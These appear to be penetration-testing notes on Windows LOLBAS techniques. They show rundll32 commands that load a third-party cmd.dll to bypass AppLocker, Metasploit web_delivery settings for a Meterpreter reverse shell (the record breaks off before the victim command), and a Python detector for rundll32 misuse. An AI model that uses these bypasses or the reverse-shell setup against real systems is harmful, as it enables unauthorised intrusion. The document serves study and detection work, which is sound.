Living Off The Land Binaries And Scripts

LOLBas - Windows utilities

Project link: https://lolbas-project.github.io/#

LOLBas

rundll32

Rundll32 is a Microsoft binary that can execute code contained in a DLL file. Because this utility is part of the Windows operating system, it can be used to bypass AppLocker rules or Software Restriction Policies. If the environment is not properly locked down and users are permitted to run this binary, they can write their own DLLs and bypass any restrictions, or execute malicious JavaScript code.

Rundll32 - CMD

On Windows systems where the command prompt has been blocked by an AppLocker rule, it is possible to bypass this restriction by loading a malicious DLL file into a legitimate process. Didier Stevens has released a modified version of cmd in the form of a DLL file, built from an open source variant obtained from ReactOS.

Download the new cmd: http://didierstevens.com/files/software/cmd-dll_v0_0_4.zip

Since rundll32 is a trusted Microsoft utility, it can be used to load cmd.dll into a process and execute the code in the DLL, therefore bypassing the AppLocker rule and opening the command prompt.

The following two commands can be executed from the Windows Run:

rundll32 C:\cmd.dll,EntryPoint

rundll32 shell32.dll,Control_RunDLL C:\cmd.dll
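As an added detection-side example (not part of the original notes), the following Python flags rundll32 process-creation events whose command line loads a DLL from outside the Windows system directories, as in the two commands above, or passes rundll32 a javascript: handler as mentioned in the introduction. The event records are constructed for the example, not real telemetry.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style);
# not real telemetry. Each entry is (image, command line).
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\rundll32.exe", r"rundll32 C:\cmd.dll,EntryPoint"),
    (r"C:\Windows\System32\rundll32.exe", r"rundll32 shell32.dll,Control_RunDLL C:\cmd.dll"),
    (r"C:\Windows\System32\rundll32.exe", r"rundll32 javascript:[payload-omitted]"),
    (r"C:\Windows\System32\rundll32.exe", r"rundll32 shell32.dll,Control_RunDLL desk.cpl"),
    (r"C:\Windows\System32\rundll32.exe", r"rundll32 user32.dll,LockWorkStation"),
    (r"C:\Windows\System32\rundll32.exe", r'rundll32 "C:\Program Files\Vendor\helper.dll",Init'),
]

# Directories from which rundll32 is expected to load DLLs by full path.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def _tokens(command_line):
    """Split a Windows command line, keeping quoted paths with spaces intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]


def flag_rundll32(image, command_line):
    """Return the reasons this rundll32 invocation deserves review (empty list = not flagged)."""
    if not image.lower().endswith("\\rundll32.exe"):
        return []
    reasons = []
    for token in _tokens(command_line)[1:]:        # skip argv[0]
        target = token.split(",", 1)[0]            # 'C:\cmd.dll,EntryPoint' -> 'C:\cmd.dll'
        lowered = target.lower()
        if lowered.startswith("javascript:"):
            reasons.append("script protocol handler passed to rundll32")
        elif lowered.endswith(".dll") and ("\\" in lowered or "/" in lowered):
            # A bare name (shell32.dll) resolves from the system directory; a full
            # path outside it is how the cmd.dll technique above shows up.
            if not lowered.startswith(SYSTEM_DIRS):
                reasons.append(f"DLL loaded from outside the Windows system directories: {target}")
    return reasons


def scan(events):
    """Map the index of each flagged event to its list of reasons."""
    return {i: r for i, (img, cl) in enumerate(events) if (r := flag_rundll32(img, cl))}
```

Legitimate third-party software also loads its own DLLs through rundll32 (the last sample event), so the full-path rule needs an allowlist built from a baseline of the environment rather than being treated as a high-confidence alert on its own.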

Rundll32 - JavaScript

It is possible to use the rundll32 binary to execute JavaScript code that carries an embedded payload and is hosted on a web server. The Metasploit web delivery module can quickly start a web server that serves a specific payload (Python, PHP or PowerShell). In this case the payload will be PowerShell.

Use: exploit/multi/script/web_delivery

Set LHOST to your IP, LPORT to the listening port, and the payload to windows/meterpreter/reverse_tcp.

Then run exploit. On the victim: